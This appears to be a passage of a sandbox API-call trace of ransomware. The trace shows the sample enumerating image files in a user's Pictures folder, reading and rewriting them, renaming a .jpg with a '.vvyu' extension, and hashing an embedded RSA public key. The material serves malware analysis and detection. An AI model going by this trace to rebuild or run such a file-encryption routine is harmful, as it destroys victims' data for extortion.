0x2d39ee0 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f40 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ee0 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39eb0 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41f98 | out: hHeap=0x6a0000) returned 1 [0193.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.383] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x53a2, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x53a2, lpOverlapped=0x0) returned 1 [0193.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.384] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x53a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.384] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.385] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.386] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.386] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.386] CloseHandle (hObject=0x584) returned 1 [0193.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0193.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0193.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0193.388] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\4uY5fsSdcyjSgJ.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\4uy5fssdcyjsgj.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\4uY5fsSdcyjSgJ.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\4uy5fssdcyjsgj.jpg.vvyu")) returned 1 [0193.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.390] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.394] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fac5460, ftCreationTime.dwHighDateTime=0x1d8a261, ftLastAccessTime.dwLowDateTime=0xeb09f100, ftLastAccessTime.dwHighDateTime=0x1d8a4db, ftLastWriteTime.dwLowDateTime=0xeb09f100, ftLastWriteTime.dwHighDateTime=0x1d8a4db, nFileSizeHigh=0x0, nFileSizeLow=0x137db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k1TTTQU2.bmp", cAlternateFileName="")) returned 1 [0193.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.394] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\k1TTTQU2.bmp") returned=".bmp" [0193.394] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\k1TTTQU2.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\k1tttqu2.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.396] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=79835) returned 1 [0193.396] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.400] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x137b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.401] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.404] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.404] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x137db, lpOverlapped=0x0) returned 1 [0193.405] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.405] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.405] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.405] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.406] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.406] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.406] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.406] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.406] GetLastError () returned 0x0 [0193.406] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.406] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.407] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.407] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.407] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x137e0) returned 0x2d49778 [0193.408] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f98 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41fe0 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.410] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ee0 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ec8 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.413] GetCurrentThreadId () returned 0x264 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45b80 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.413] GetCurrentThreadId () returned 0x264 [0193.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 